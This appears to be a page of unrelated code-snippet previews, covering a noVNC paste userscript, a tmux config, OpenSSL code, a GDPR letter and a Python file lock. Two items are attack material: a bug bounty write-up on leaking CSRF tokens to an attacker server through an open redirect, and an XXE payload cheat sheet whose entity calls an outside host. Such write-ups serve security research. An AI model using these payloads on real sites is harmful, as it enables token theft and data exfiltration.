amunchet

// ==UserScript==
// @name         noVNC Paste for Proxmox
// @namespace    http://tampermonkey.net/
// @version      0.2a
// @description  Pastes text into a noVNC window (for use with Proxmox specifically)
// @author       Chester Enright
// @match        https://*
// @include      /^.*novnc.*/
// @require http://code.jquery.com/jquery-3.3.1.min.js
// @grant        none

stefanocoding

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
2. User loads https://example.com/?code=VALUE
3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user

   GET /verify/VALUE HTTP/1.1
   Host: example.com
   

aeris

Dear Sir/Madam:

I am writing to you in your capacity as data protection officer for your 
company. In light of recent spam received on this email address,
I am making this request for access to personal data 
pursuant to Article 15 of the General Data Protection Regulation.
I am concerned that your company’s information practices may be putting my 
personal information at undue risk of exposure or in fact has breached its 
obligation to safeguard my personal information.

hfiref0x

typedef struct tagCREATELINKDATA {
    ULONG  dwFlags;
    WCHAR szLinkName[MAX_PATH];     // + 0x20C
    WCHAR szExeName[MAX_PATH];      // + 0x414
    WCHAR szParams[MAX_PATH];       // + 0x61C
    WCHAR szWorkingDir[MAX_PATH];   // + 0x824
    WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
    WCHAR szExpExeName[MAX_PATH];   // + 0xC34
    WCHAR szProgDesc[MAX_PATH];     // + 0xE3C
    WCHAR szFolder[MAX_PATH];       // + 0x1044

ahpaleus

#include <openssl/conf.h>
#include <openssl/evp.h>
#include <openssl/err.h>
#include <string.h>

int main (void)
{

  /* A 256 bit key */
  unsigned char *key = (unsigned char *)"01234567890123456789012345678901";

william8th

# Set the control character to Ctrl+Spacebar (instead of Ctrl+B)
set -g prefix C-space
unbind-key C-b
bind-key C-space send-prefix

# Set new panes to open in current directory
bind c new-window -c "#{pane_current_path}"
bind '"' split-window -c "#{pane_current_path}"
bind % split-window -h -c "#{pane_current_path}"

dpino

#!/usr/bin/env bash

# set -x

if [[ $EUID -ne 0 ]]; then
    echo "You must be root to run this script"
    exit 1
fi

# Returns all available interfaces, except "lo" and "veth*".

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

soarez

How to setup your own CA with OpenSSL

For educational reasons I've decided to create my own CA. Here is what I learned.

First things first

Lets get some context first.

jmckib

Tested on Mac OS X 10.6.6 and Ubuntu 10.10 with Python 2.6.6

To try it out, open up a python shell and type:
>>> from lock import FileLock
>>> lock = FileLock("my_lock", dir="/var/tmp")
>>> lock.acquire()

Leave the first shell open, and open another python shell and type the same thing:
>>> from lock import FileLock
>>> lock = FileLock("my_lock", dir="/var/tmp")